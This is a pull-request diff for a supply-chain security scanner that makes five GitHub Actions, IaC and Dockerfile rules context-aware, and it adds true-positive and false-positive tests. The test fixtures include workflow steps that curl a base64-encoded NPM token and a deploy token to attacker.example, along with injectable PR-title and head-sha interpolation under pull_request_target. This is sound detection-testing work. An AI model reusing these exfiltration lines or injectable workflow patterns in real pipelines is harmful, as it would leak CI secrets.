### PR TITLE
fix(rules): make five rules context-aware instead of shape-matching

### DIFF
--- a/.ai/handoff/DASHBOARD.md
+++ b/.ai/handoff/DASHBOARD.md
@@ -14,7 +14,7 @@
 | Version | 5.17.9 |
 | Node engines | >=20.0.0 |
 | Source modules | 64 under `src/` |
-| Test files | 81 under `src/__tests__/` |
+| Test files | 82 under `src/__tests__/` |
 | tsconfig `types: ["node"]` | yes |
 | Build / test / audit | verified continuously in CI - see below |
 

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,16 +3,16 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1784965071",
-    "timestamp": "2026-07-25T07:37:51Z",
-    "commit": "b2abb38",
+    "session_id": "cli-1784965116",
+    "timestamp": "2026-07-25T07:38:36Z",
+    "commit": "f5907b1",
     "phase": "idle",
     "duration_minutes": 0
   },
   "files": {
     "STATUS.md": {
-      "checksum": "sha256:8da29ee1368110ccee08bc09ec0b18ecf21ed6394c1d90735232a4a368d9097b",
-      "updated": "2026-07-25T07:32:27Z",
+      "checksum": "sha256:774140931b9b47d62f43fabb98a4a31133f1d824a393716b717316529bf749f7",
+      "updated": "2026-07-25T07:38:24Z",
       "lines": 1044,
       "summary": "(no summary available)"
     },
@@ -24,7 +24,7 @@
     },
     "LOG.md": {
       "checksum": "sha256:93f8ad953dd2e786415b8cd68361d3d4ab2e977e92b64aef591c64c409c72f21",
-      "updated": "2026-07-25T07:37:51Z",
+      "updated": "2026-07-25T07:38:36Z",
       "lines": 113,
       "summary": "(no summary available)"
     },
@@ -42,13 +42,13 @@
     },
     "DASHBOARD.md": {
       "checksum": "sha256:8b04cd5b47d9f3bf5547d6c95350bfe51f068e012f7a07f6a04eef7dddf0c110",
-      "updated": "2026-07-25T07:37:51Z",
+      "updated": "2026-07-25T07:38:36Z",
       "lines": 66,
       "summary": "(no summary available)"
     },
     "TRUST.md": {
       "checksum": "sha256:e04ab27879bb265bd65b218d52ba2608ef4e1b8ff8163260075b86260f5700e6",
-      "updated": "2026-07-25T07:37:51Z",
+      "updated": "2026-07-25T07:38:36Z",
       "lines": 49,
       "summary": "(no summary available)"
     },

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,76 +3,76 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1784956201",
-    "timestamp": "2026-07-25T05:10:01Z",
-    "commit": "d1a670f",
+    "session_id": "cli-1784964763",
+    "timestamp": "2026-07-25T07:32:43Z",
+    "commit": "52a87b3",
     "phase": "idle",
     "duration_minutes": 0
   },
   "files": {
     "STATUS.md": {
-      "checksum": "sha256:1376e3bfec4ffc1f4a9bef652bb9227744138536fd1bbe6337d73e03a885921f",
-      "updated": "2026-07-25T05:09:47Z",
-      "lines": 1003,
+      "checksum": "sha256:8da29ee1368110ccee08bc09ec0b18ecf21ed6394c1d90735232a4a368d9097b",
+      "updated": "2026-07-25T07:32:27Z",
+      "lines": 1044,
       "summary": "(no summary available)"
     },
     "NEXT_ACTIONS.md": {
       "checksum": "sha256:1b98ef14a4c1d7dfc8ab1e9e726ecb23532005b2371fb48c5910c1b7166781e0",
-      "updated": "2026-07-25T05:09:54Z",
+      "updated": "2026-07-25T06:58:02Z",
       "lines": 62,
       "summary": "(no summary available)"
     },
     "LOG.md": {
       "checksum": "sha256:93f8ad953dd2e786415b8cd68361d3d4ab2e977e92b64aef591c64c409c72f21",
-      "updated": "2026-07-25T05:10:01Z",
+      "updated": "2026-07-25T07:32:43Z",
       "lines": 113,
       "summary": "(no summary available)"
     },
     "LOG-ARCHIVE.md": {
       "checksum": "sha256:e566ec8a4b80bba4b488aa69c5bf0e2a4ef1753046f18b81afe80a6846c73149",
-      "updated": "2026-07-18T08:02:38Z",
+      "updated": "2026-07-25T06:58:02Z",
       "lines": 132,
       "summary": "(no summary available)"
     },
     "LOG-ARCHIVE.index.json": {
       "checksum": "sha256:94b2e7524ade23f11edc97075afc33bc9884288661336bb6ce279d6928d22c62",
-      "updated": "2026-07-18T08:02:38Z",
+      "updated": "2026-07-25T06:58:02Z",
       "lines": 11,
       "summary": "{"
     },
     "DASHBOARD.md": {
-      "checksum": "sha256:b882dec4c0a384b478fbd5676012bc69185944c09fe3989123523ea2672185d8",
-      "updated": "2026-07-25T05:10:01Z",
+      "checksum": "sha256:8b04cd5b47d9f3bf5547d6c95350bfe51f068e012f7a07f6a04eef7dddf0c110",
+      "updated": "2026-07-25T07:32:43Z",
       "lines": 66,
       "summary": "(no summary available)"
     },
     "TRUST.md": {
-      "checksum": "sha256:7015708a1b0cee813cdb6531b998348f1fb26092ba258d868f1044ca1a6dd65e",
-      "updated": "2026-07-25T05:10:01Z",
+      "checksum": "sha256:e04ab27879bb265bd65b218d52ba2608ef4e1b8ff8163260075b86260f5700e6",
+      "updated": "2026-07-25T07:32:43Z",
       "lines": 49,
       "summary": "(no summary available)"
     },
     "CONVENTIONS.md": {
       "checksum": "sha256:3260c91bb9b609eafcd1597268e233694f20c8e53c7fba439c4da1cea65aeedc",
-      "updated": "2026-07-18T18:29:50Z",
+      "updated": "2026-07-25T06:58:02Z",
       "lines": 108,
       "summary": "(no summary available)"
     },
     "WORKFLOW.md": {
       "checksum": "sha256:94ceab2bc0623734e0c0f0a2b0140d2e1a07cac25d903c12282327c415ae94e7",
-      "updated": "2026-07-18T08:07:40Z",
+      "updated": "2026-07-25T06:58:02Z",
       "lines": 133,
       "summary": "(no summary available)"
     },
     "GROUNDING.md": {
       "checksum": "sha256:7ef8cece585dc5defb4285175b9ba560d5469675df553d4ce28ec9e7aec24343",
-      "updated": "2026-07-18T08:46:03Z",
+      "updated": "2026-07-25T06:58:02Z",
       "lines": 209,
       "summary": "(no summary available)"
     },
     "pii-allowlist.json": {
       "checksum": "sha256:7c1051f6e2bc3943b7c1dbe4da229694455681b8875a346c99279e555edb733f",
-      "updated": "2026-06-28T09:06:54Z",
+      "updated": "2026-07-25T06:58:02Z",
       "lines": 4,
       "summary": "{"
     }
@@ -80,7 +80,7 @@
   "quick_context": "(no summary available) (no summary available) ",
   "token_budget": {
     "manifest_only": 85,
-    "manifest_plus_core": 14986,
-    "full_read": 23304
+    "manifest_plus_core": 15649,
+    "full_read": 23967
   }
 }

--- a/.ai/handoff/MANIFEST.json
+++ b/.ai/handoff/MANIFEST.json
@@ -3,9 +3,9 @@
   "project": "supply-chain-guard",
   "last_session": {
     "agent": "handoff-refresh",
-    "session_id": "cli-1784964763",
-    "timestamp": "2026-07-25T07:32:43Z",
-    "commit": "52a87b3",
+    "session_id": "cli-1784965071",
+    "timestamp": "2026-07-25T07:37:51Z",
+    "commit": "b2abb38",
     "phase": "idle",
     "duration_minutes": 0
   },
@@ -24,7 +24,7 @@
     },
     "LOG.md": {
       "checksum": "sha256:93f8ad953dd2e786415b8cd68361d3d4ab2e977e92b64aef591c64c409c72f21",
-      "updated": "2026-07-25T07:32:43Z",
+      "updated": "2026-07-25T07:37:51Z",
       "lines": 113,
       "summary": "(no summary available)"
     },
@@ -42,13 +42,13 @@
     },
     "DASHBOARD.md": {
       "checksum": "sha256:8b04cd5b47d9f3bf5547d6c95350bfe51f068e012f7a07f6a04eef7dddf0c110",
-      "updated": "2026-07-25T07:32:43Z",
+      "updated": "2026-07-25T07:37:51Z",
       "lines": 66,
       "summary": "(no summary available)"
     },
     "TRUST.md": {
       "checksum": "sha256:e04ab27879bb265bd65b218d52ba2608ef4e1b8ff8163260075b86260f5700e6",
-      "updated": "2026-07-25T07:32:43Z",
+      "updated": "2026-07-25T07:37:51Z",
       "lines": 49,
       "summary": "(no summary available)"
     },

--- a/.ai/handoff/STATUS.md
+++ b/.ai/handoff/STATUS.md
@@ -1,7 +1,7 @@
 > Note (2026-07-25, claude-opus-5): Rule-precision pass after a fleet audit showed that
 > most of the reported risk across 13 scanned repositories came from rules matching a
 > SHAPE without context or value. Fixed five, each with a true-positive AND a
-> false-positive test (src/__tests__/rule-precision.test.ts, 34 tests):
+> false-positive test (src/__tests__/rule-precision.test.ts, 35 tests):
 > (1) GHA_SECRET_EXFIL_MULTILINE had a file-level sticky `envSecretsExported` flag and a
 > run-block exit test that only a column-0 line could satisfy, so one step's env secret
 > made every later curl look like exfiltration and the finding named the wrong block. Now
@@ -32,7 +32,7 @@
 > findings, 10 -> 1 criticals, with NO finding lost that was not one of the confirmed
 > false-positive classes (the 4 deploy-workflow exfil findings stayed, only moved to the
 > correct line). Self-scan 0 findings / risk 0 with the suppression removed. Full suite
-> 1402 pass; the 14 vscode-scanner "zip" tests still fail locally on Windows (known env
+> 1403 pass; the 14 vscode-scanner "zip" tests still fail locally on Windows (known env
 > gap, green in CI). NOT fixed, reported for a decision: WORKFLOW_SECRET_TO_UPLOAD_PATH
 > (three bare .test(content) regexes, `https?://` anywhere counts as egress),
 > VIDAR_WALLET_THEFT (unbounded `.*` matched "phantom" to "seed" across a 20KB JSON line

--- a/.ai/handoff/STATUS.md
+++ b/.ai/handoff/STATUS.md
@@ -1,3 +1,44 @@
+> Note (2026-07-25, claude-opus-5): Rule-precision pass after a fleet audit showed that
+> most of the reported risk across 13 scanned repositories came from rules matching a
+> SHAPE without context or value. Fixed five, each with a true-positive AND a
+> false-positive test (src/__tests__/rule-precision.test.ts, 34 tests):
+> (1) GHA_SECRET_EXFIL_MULTILINE had a file-level sticky `envSecretsExported` flag and a
+> run-block exit test that only a column-0 line could satisfy, so one step's env secret
+> made every later curl look like exfiltration and the finding named the wrong block. Now
+> per step via the AST (step env + job env + workflow env + the step's own run), reporting
+> the line of the network command; `git fetch` no longer counts as egress. Files the
+> parser cannot split into steps keep the old file-level check (fail closed).
+> (2)+(3) GHA_PPE_PULL_TARGET and GHA_SCRIPT_INJECTION were bare file regexes that fired
+> on `env: PR_TITLE: ${{ github.event.pull_request.title }}`, the mitigation GitHub
+> documents and our own recommendation text prescribes. New classifyWorkflowLines() in
+> workflow-ast.ts labels each line exec / env / structural; both rules consider exec lines
+> only, and PPE additionally requires an elevated trigger (pull_request_target,
+> workflow_run, issue_comment, pull_request_review_comment), a workflow_call whose caller
+> may be privileged, or an unreadable trigger block. The env hop is not a bypass: a value
+> read back with ${{ env.NAME }} inside run: is still reported.
+> (4) IAC_HARDCODED_SECRET never looked at the value, so `password = "${REDIS_PASSWORD}"`,
+> `password = "$(openssl rand -base64 32)"` and `const token = "trust_pat_"` were all
+> CRITICAL. PatternEntry gained an optional `valueFilter` (honoured by every pattern loop);
+> isLikelyRealSecretValue() rejects references, substitutions, prefix templates, paths and
+> placeholders, all structural checks, so a real credential is untouched.
+> (5) DOCKER_NPM_GLOBAL contradicted its own recommendation by firing on `npm install -g
+> pnpm@9` / `npm@11.18.0`; it now parses the specs and reports only unversioned, dist-tag
+> or range installs (and covers `npm i` / `npm add` / `--location=global`). Our own
+> DOCKER_NPM_GLOBAL suppression is therefore deleted from .supply-chain-guard.yml.
+> (6) allowlist.githubOrgs was parsed, documented and schema-validated but never read by
+> applyPolicy(); it now suppresses GHA_THIRD_PARTY_ACTION / GHA_TAG_NOT_SHA for an
+> allowlisted owner, while pinning and known-malicious-SHA rules stay armed.
+> Measured on 7 real Elvatis repos (baseline v5.17.9 binary vs this branch): 128 -> 92
+> findings, 10 -> 1 criticals, with NO finding lost that was not one of the confirmed
+> false-positive classes (the 4 deploy-workflow exfil findings stayed, only moved to the
+> correct line). Self-scan 0 findings / risk 0 with the suppression removed. Full suite
+> 1402 pass; the 14 vscode-scanner "zip" tests still fail locally on Windows (known env
+> gap, green in CI). NOT fixed, reported for a decision: WORKFLOW_SECRET_TO_UPLOAD_PATH
+> (three bare .test(content) regexes, `https?://` anywhere counts as egress),
+> VIDAR_WALLET_THEFT (unbounded `.*` matched "phantom" to "seed" across a 20KB JSON line
+> in a handoff MANIFEST), TYPOSQUAT_LEVENSHTEIN ("pino" vs "sinon", 14x in one repo) and
+> SECRETS_PRIVATE_KEY (PEM header only, fired on a MOCK-KEY-REPLACE-IN-PRODUCTION literal).
+>
 > Note (2026-07-25, claude-opus-4-8): Released v5.17.9 - daily threat-intel refresh
 > (scheduled task). arena.elvatis.com/api/news again carried mostly named campaigns with
 > no atomic IOCs, so - per the task's STEP 1b - enriched from primary vendor write-ups.

--- a/.ai/handoff/TRUST.md
+++ b/.ai/handoff/TRUST.md
@@ -32,7 +32,7 @@ for the two-axis (status x provenance) model and the task-type anchor matrix.
 |----------|-------|------------|--------|
 | package.json version | 5.17.9 | tool_verified | package.json |
 | Source modules present | 64 | tool_verified | src/ file list |
-| Test files present | 81 | tool_verified | src/__tests__/ file list |
+| Test files present | 82 | tool_verified | src/__tests__/ file list |
 | tsconfig `types: ["node"]` | yes | tool_verified | tsconfig.json (load-bearing under TS6) |
 | Runtime dependency | commander ^14.0.3 | tool_verified | package.json (CommonJS line; 15+ is ESM-only) |
 

--- a/.supply-chain-guard.yml
+++ b/.supply-chain-guard.yml
@@ -37,9 +37,6 @@ suppress:
   - rule: SHAI_HULUD_CRED_STEAL
     reason: same generator template mentions NPM_TOKEN only to document that OIDC publishing uses no token; no credential access occurs
 
-  # Our own Dockerfile intentionally installs the package globally - from the
-  # LOCALLY BUILT tarball of the tagged source (npm pack output), never from
-  # the registry. The rule targets images pulling arbitrary remote packages;
-  # a self-built artifact install is the by-design distribution path.
-  - rule: DOCKER_NPM_GLOBAL
-    reason: official image installs the locally built tarball of the tagged source (npm pack), not a remote registry package; reviewed at v5.5.0
+  # The DOCKER_NPM_GLOBAL suppression that used to sit here is gone: the rule
+  # now inspects the package specs and no longer fires on our image's local
+  # tarball install. Fixing the rule beat documenting an exception for it.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,66 @@ top; release tags trigger the CI publish pipeline (npm via OIDC + GitHub Release
 
 ## [Unreleased]
 
+**Rule precision: five rules narrowed with context, none weakened**
+
+A fleet audit found that a large share of the reported risk across 13 scanned
+repositories came from rules that matched a SHAPE without ever looking at the
+context or the value. Each fix below narrows a rule by teaching it something it
+did not know before; every rule keeps a true-positive test proving the attack it
+exists for is still detected.
+
+- **`GHA_SECRET_EXFIL_MULTILINE` is now per step.** The old implementation kept
+  a file-level `envSecretsExported` flag that was sticky: once any step put a
+  secret in its `env:`, every later run block that merely mentioned `curl` was
+  reported. Its run-block exit test could only be satisfied by a column-0 line,
+  so blocks never ended and the finding named whichever `run:` came last, not
+  the one holding the secret. Secrets in scope are now resolved per step
+  (step `env:` + job `env:` + workflow `env:` + the step's own `run` body) and
+  the finding points at the network command inside that step. Workflows the
+  parser cannot break into steps still get the old file-level check, so nothing
+  goes undetected.
+- **`GHA_PPE_PULL_TARGET` and `GHA_SCRIPT_INJECTION` are context-aware.** Both
+  were bare regexes over the whole file, so both fired on
+  `env: PR_TITLE: ${{ github.event.pull_request.title }}` - the mitigation
+  GitHub documents and that this scanner's own recommendation text tells users
+  to apply. A new `classifyWorkflowLines()` pass in `workflow-ast.ts` labels
+  every line `exec` (a `run:` or github-script `script:` body), `env:` or
+  structural, and both rules now only consider `exec` lines. PPE additionally
+  requires the elevated context it is named for (`pull_request_target`,
+  `workflow_run`, `issue_comment`, `pull_request_review_comment`), a reusable
+  `workflow_call` whose caller may be privileged, or an unreadable trigger
+  block. Interpolating PR context in a plain `pull_request` job gains an
+  attacker nothing: that job already runs their code with a read-only token and
+  no secrets. The `env:` hop is not a loophole: a value moved into `env:` and
+  read back with `${{ env.NAME }}` (rather than the shell's `$NAME`) is still
+  template-interpolated and is still reported, at the line that reads it back.
+- **`IAC_HARDCODED_SECRET` inspects the value.** It matched
+  `token = "<8+ chars>"` and never asked what the value was, so
+  `password = "${REDIS_PASSWORD}"` (a variable), `password = "$(openssl rand
+  -base64 32)"` (a password being GENERATED) and `const token = "trust_pat_"`
+  (a namespace prefix) were all CRITICAL hardcoded secrets. Patterns can now
+  carry a `valueFilter`, and this rule uses one that rejects variable
+  references, command substitutions, template expressions, prefix templates,
+  filesystem paths and documentation placeholders. The checks are structural:
+  each identifies a value that cannot be a credential, so a real embedded
+  credential is untouched.
+- **`DOCKER_NPM_GLOBAL` fires on unpinned installs only.** Its recommendation
+  said "pin the global package version" while the rule flagged
+  `RUN npm install -g pnpm@9` and `RUN npm install -g npm@11.18.0`, which are
+  pinned (27 such findings in one repository). It now parses the package specs
+  and reports only when one is unversioned, a dist-tag (`@latest`), or a range
+  (`@^9`). The `npm i` / `npm add` / `--location=global` spellings are covered
+  too, and a locally built tarball is not treated as a registry dependency.
+- **`allowlist.githubOrgs` is enforced.** It was parsed, documented and
+  schema-validated but never read by `applyPolicy()` - a security config that
+  silently did nothing. It now suppresses the ownership-trust findings
+  (`GHA_THIRD_PARTY_ACTION`, `GHA_TAG_NOT_SHA`) for actions owned by an
+  allowlisted org. Pinning and known-malicious-SHA rules stay armed: trusting a
+  publisher says who ships the code, not that every version of it is safe.
+- The scanner's own `.supply-chain-guard.yml` drops its `DOCKER_NPM_GLOBAL`
+  suppression. The rule no longer fires on the image's pinned local-tarball
+  install, so the suppression is no longer needed.
+
 ## [5.17.9] - 2026-07-25
 **Threat intel: FakeAgent / SectopRAT fake Claude Desktop malvertising**
 

--- a/README.md
+++ b/README.md
@@ -256,8 +256,10 @@ allowlist:
     # host is this domain or a subdomain of it.
     - company.internal
   githubOrgs:
-    # Parsed but not yet enforced: repo-trust findings do not currently carry
-    # the owning org. Use rules.disable or a suppress entry for REPO_* rules.
+    # Trusted action publishers. Suppresses the ownership-trust findings
+    # (GHA_THIRD_PARTY_ACTION, GHA_TAG_NOT_SHA) for actions owned by these
+    # orgs. Pinning and known-malicious-SHA rules stay armed: trusting an org
+    # says who publishes the code, not that every version of it is safe.
     - my-org
 
 # Skip files matched by these path globs (** / * / ?) during the scan.

--- a/policy-schema.json
+++ b/policy-schema.json
@@ -48,7 +48,7 @@
           "items": { "type": "string", "minLength": 1 }
         },
         "githubOrgs": {
-          "description": "Trusted GitHub organizations.",
+          "description": "Trusted GitHub action publishers. Suppresses ownership-trust findings (GHA_THIRD_PARTY_ACTION, GHA_TAG_NOT_SHA) for actions owned by these orgs; pinning and known-malicious-SHA rules stay armed.",
           "type": "array",
           "items": { "type": "string", "minLength": 1 }
         }

--- a/src/__tests__/rule-precision.test.ts
+++ b/src/__tests__/rule-precision.test.ts
@@ -1,0 +1,543 @@
+import { describe, it, expect, beforeEach, afterEach } from "vitest";
+import * as fs from "node:fs";
+import * as path from "node:path";
+import { scanGitHubActionsWorkflows } from "../github-actions-scanner.js";
+import { scanDockerFile, isUnpinnedGlobalInstall } from "../dockerfile-scanner.js";
+import { isLikelyRealSecretValue } from "../patterns.js";
+import { applyPolicy } from "../policy-engine.js";
+import { scan } from "../scanner.js";
+import { classifyWorkflowLines } from "../workflow-ast.js";
+import type { Finding } from "../types.js";
+
+/**
+ * Rule-precision fixes (v5.18).
+ *
+ * Every rule touched here gets BOTH halves of the contract:
+ *   - a TRUE POSITIVE test proving the real attack the rule exists for is
+ *     still detected, and
+ *   - a FALSE POSITIVE test proving the benign pattern that motivated the fix
+ *     is no longer reported.
+ *
+ * Workflow content is built with array.join("\n") so `${{ ... }}` is never
+ * mis-parsed as a JS template literal (same convention as the other GHA tests).
+ */
+function writeWorkflow(baseDir: string, name: string, lines: string[]): void {
+  const workflowDir = path.join(baseDir, ".github", "workflows");
+  fs.mkdirSync(workflowDir, { recursive: true });
+  fs.writeFileSync(path.join(workflowDir, name), lines.join("\n"));
+}
+
+describe("v5.18 rule precision", () => {
+  let tempDir: string;
+
+  beforeEach(() => {
+    tempDir = fs.mkdtempSync(path.join("/tmp", "scg-precision-"));
+  });
+
+  afterEach(() => {
+    fs.rmSync(tempDir, { recursive: true, force: true });
+  });
+
+  // ── GHA_SECRET_EXFIL_MULTILINE: per-step, not a file-level sticky flag ────
+
+  describe("GHA_SECRET_EXFIL_MULTILINE", () => {
+    it("TRUE POSITIVE: a step whose env holds a secret and whose run curls it out", () => {
+      writeWorkflow(tempDir, "steal.yml", [
+        "name: Steal",
+        "on: push",
+        "jobs:",
+        "  build:",
+        "    runs-on: ubuntu-latest",
+        "    steps:",
+        "      - name: Collect",
+        "        env:",
+        "          NPM_TOKEN: ${{ secrets.NPM_TOKEN }}",
+        "        run: |",
+        '          DATA=$(printf "%s" "$NPM_TOKEN" | base64)',
+        '          curl -s -X POST -d "$DATA" https://attacker.example/collect',
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      const f = findings.find((f) => f.rule === "GHA_SECRET_EXFIL_MULTILINE");
+      expect(f).toBeDefined();
+      expect(f?.severity).toBe("high");
+      // Points at the curl line inside the offending step, not at some other block.
+      expect(f?.line).toBe(12);
+    });
+
+    it("TRUE POSITIVE: a job-level env secret is in scope for the step that curls", () => {
+      writeWorkflow(tempDir, "joblevel.yml", [
+        "on: push",
+        "jobs:",
+        "  build:",
+        "    env:",
+        "      TOKEN: ${{ secrets.DEPLOY_TOKEN }}",
+        "    steps:",
+        "      - run: |",
+        '          curl -X POST -d "$TOKEN" https://attacker.example/x',
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SECRET_EXFIL_MULTILINE")).toBe(true);
+    });
+
+    it("points at the outbound call, not at a `git fetch` earlier in the step", () => {
+      // `git fetch` pulls source INTO the runner and carries no secret out;
+      // matching the bare word made the finding name a repository sync.
+      writeWorkflow(tempDir, "deploy-sync.yml", [
+        "on: push",
+        "jobs:",
+        "  deploy:",
+        "    steps:",
+        "      - name: Deploy via SSH",
+        "        env:",
+        "          SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}",
+        "        run: |",
+        '          echo "$SSH_PRIVATE_KEY" > key',
+        "          git fetch origin main",
+        "          curl -fsS https://example.com/healthz",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      const f = findings.find((f) => f.rule === "GHA_SECRET_EXFIL_MULTILINE");
+      expect(f).toBeDefined();
+      expect(f?.line).toBe(11);
+    });
+
+    it("FALSE POSITIVE: a step that only runs `git fetch` with a secret in scope", () => {
+      writeWorkflow(tempDir, "sync.yml", [
+        "on: push",
+        "jobs:",
+        "  sync:",
+        "    steps:",
+        "      - env:",
+        "          TOKEN: ${{ secrets.GITHUB_TOKEN }}",
+        "        run: |",
+        "          git fetch origin main",
+        "          git reset --hard origin/main",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SECRET_EXFIL_MULTILINE")).toBe(false);
+    });
+
+    it("FALSE POSITIVE: a later, secret-free step that merely uses curl", () => {
+      // The old file-level `envSecretsExported` flag was sticky: once ANY step
+      // put a secret in env:, every later run block containing "curl" was
+      // reported - and the reported line pointed at the wrong block entirely.
+      writeWorkflow(tempDir, "deploy.yml", [
+        "name: Deploy",
+        "on: workflow_dispatch",
+        "permissions:",
+        "  contents: read",
+        "jobs:",
+        "  deploy:",
+        "    runs-on: ubuntu-latest",
+        "    steps:",
+        "      - name: Write key",
+        "        env:",
+        "          SSH_PRIVATE_KEY: ${{ secrets.SSH_PRIVATE_KEY }}",
+        "        run: |",
+        '          echo "$SSH_PRIVATE_KEY" > key',
+        "          chmod 600 key",
+        "      - name: Readiness probe",
+        "        run: |",
+        "          curl -fsS https://example.com/ready",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SECRET_EXFIL_MULTILINE")).toBe(false);
+    });
+  });
+
+  // ── GHA_PPE_PULL_TARGET: exec sink + elevated trigger ────────────────────
+
+  describe("GHA_PPE_PULL_TARGET", () => {
+    it("TRUE POSITIVE: PR head sha interpolated into run: on pull_request_target", () => {
+      // The elvatis/atlas pattern - the real PPE this rule exists to catch.
+      writeWorkflow(tempDir, "ppe.yml", [
+        "on: pull_request_target",
+        "jobs:",
+        "  build:",
+        "    runs-on: ubuntu-latest",
+        "    steps:",
+        "      - run: |",
+        "          git checkout ${{ github.event.pull_request.head.sha }}",
+        "          npm run build",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      const f = findings.find((f) => f.rule === "GHA_PPE_PULL_TARGET");
+      expect(f).toBeDefined();
+      expect(f?.severity).toBe("critical");
+      expect(f?.line).toBe(7);
+    });
+
+    it("TRUE POSITIVE: issue_comment trigger interpolating PR context into run:", () => {
+      writeWorkflow(tempDir, "cmd.yml", [
+        "on: issue_comment",
+        "jobs:",
+        "  run:",
+        "    steps:",
+        "      - run: echo ${{ github.event.pull_request.head.ref }}",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_PPE_PULL_TARGET")).toBe(true);
+    });
+
+    it("TRUE POSITIVE: env: hop that is read back with ${{ env.X }} inside run:", () => {
+      // Moving the value into env: only helps if the shell reads $SHA. Reading
+      // it back through the env CONTEXT is still template interpolation.
+      writeWorkflow(tempDir, "envhop.yml", [
+        "on: pull_request_target",
+        "jobs:",
+        "  build:",
+        "    steps:",
+        "      - env:",
+        "          SHA: ${{ github.event.pull_request.head.sha }}",
+        "        run: echo ${{ env.SHA }}",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_PPE_PULL_TARGET")).toBe(true);
+    });
+
+    it("FALSE POSITIVE: PR context moved into env: (the official mitigation)", () => {
+      writeWorkflow(tempDir, "pr-checks.yml", [
+        "on:",
+        "  pull_request:",
+        "    types: [opened, edited, synchronize, reopened]",
+        "jobs:",
+        "  diff:",
+        "    runs-on: ubuntu-latest",
+        "    steps:",
+        "      - name: Scan PR diff",
+        "        env:",
+        "          BASE_SHA: ${{ github.event.pull_request.base.sha }}",
+        "          HEAD_SHA: ${{ github.event.pull_request.head.sha }}",
+        "        run: |",
+        '          echo "Scanning diff from $BASE_SHA to $HEAD_SHA"',
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_PPE_PULL_TARGET")).toBe(false);
+    });
+
+    it("FALSE POSITIVE: PR sha in run: under a plain pull_request trigger", () => {
+      // No elevated context: a fork PR job has a read-only token and no
+      // secrets, so the attacker gains nothing they did not already control.
+      writeWorkflow(tempDir, "ci.yml", [
+        "on:",
+        "  push:",
+        "    branches: [main]",
+        "  pull_request:",
+        "jobs:",
+        "  changes:",
+        "    steps:",
+        "      - run: |",
+        "          base_sha='${{ github.event.pull_request.base.sha }}'",
+        "          head_sha='${{ github.event.pull_request.head.sha }}'",
+        '          git diff --name-only "$base_sha" "$head_sha"',
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_PPE_PULL_TARGET")).toBe(false);
+    });
+
+    it("stays armed when the trigger cannot be determined (fail closed)", () => {
+      writeWorkflow(tempDir, "notrigger.yml", [
+        "jobs:",
+        "  build:",
+        "    steps:",
+        "      - run: echo ${{ github.event.pull_request.head.sha }}",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_PPE_PULL_TARGET")).toBe(true);
+    });
+
+    it("stays armed for a reusable workflow whose caller may be privileged", () => {
+      writeWorkflow(tempDir, "reusable.yml", [
+        "on:",
+        "  workflow_call:",
+        "jobs:",
+        "  build:",
+        "    steps:",
+        "      - run: echo ${{ github.event.pull_request.head.sha }}",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_PPE_PULL_TARGET")).toBe(true);
+    });
+  });
+
+  // ── GHA_SCRIPT_INJECTION: exec sink only ─────────────────────────────────
+
+  describe("GHA_SCRIPT_INJECTION", () => {
+    it("TRUE POSITIVE: PR title interpolated into a run: block", () => {
+      writeWorkflow(tempDir, "title.yml", [
+        "on: pull_request_target",
+        "jobs:",
+        "  check:",
+        "    steps:",
+        '      - run: echo "${{ github.event.pull_request.title }}"',
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      const f = findings.find((f) => f.rule === "GHA_SCRIPT_INJECTION");
+      expect(f).toBeDefined();
+      expect(f?.severity).toBe("critical");
+    });
+
+    it("TRUE POSITIVE: issue body interpolated into a github-script script: body", () => {
+      writeWorkflow(tempDir, "gs.yml", [
+        "on: issues",
+        "jobs:",
+        "  triage:",
+        "    steps:",
+        "      - uses: actions/github-script@v7",
+        "        with:",
+        "          script: |",
+        "            const body = `${{ github.event.issue.body }}`",
+        "            console.log(body)",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SCRIPT_INJECTION")).toBe(true);
+    });
+
+    it("TRUE POSITIVE: env: hop read back with ${{ env.X }} inside run:", () => {
+      writeWorkflow(tempDir, "envhop2.yml", [
+        "on: issues",
+        "jobs:",
+        "  triage:",
+        "    steps:",
+        "      - env:",
+        "          BODY: ${{ github.event.issue.body }}",
+        "        run: echo ${{ env.BODY }}",
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
+      expect(findings.some((f) => f.rule === "GHA_SCRIPT_INJECTION")).toBe(true);
+    });
+
+    it("FALSE POSITIVE: PR title in env:, read as a shell variable", () => {
+      // This is verbatim what the rule's own recommendation tells users to do.
+      writeWorkflow(tempDir, "safe-title.yml", [
+        "on: pull_request",
+        "jobs:",
+        "  pr-title:",
+        "    steps:",
+        "      - name: Check PR title format",
+        "        env:",
+        "          PR_TITLE: ${{ github.event.pull_request.title }}",
+        "        run: |",
+        '          echo "PR title: $PR_TITLE"',
+        '          echo "$PR_TITLE" | grep -Eq "^(feat|fix): ."',
+      ]);
+      const findings = scanGitHubActionsWorkflows(tempDir);
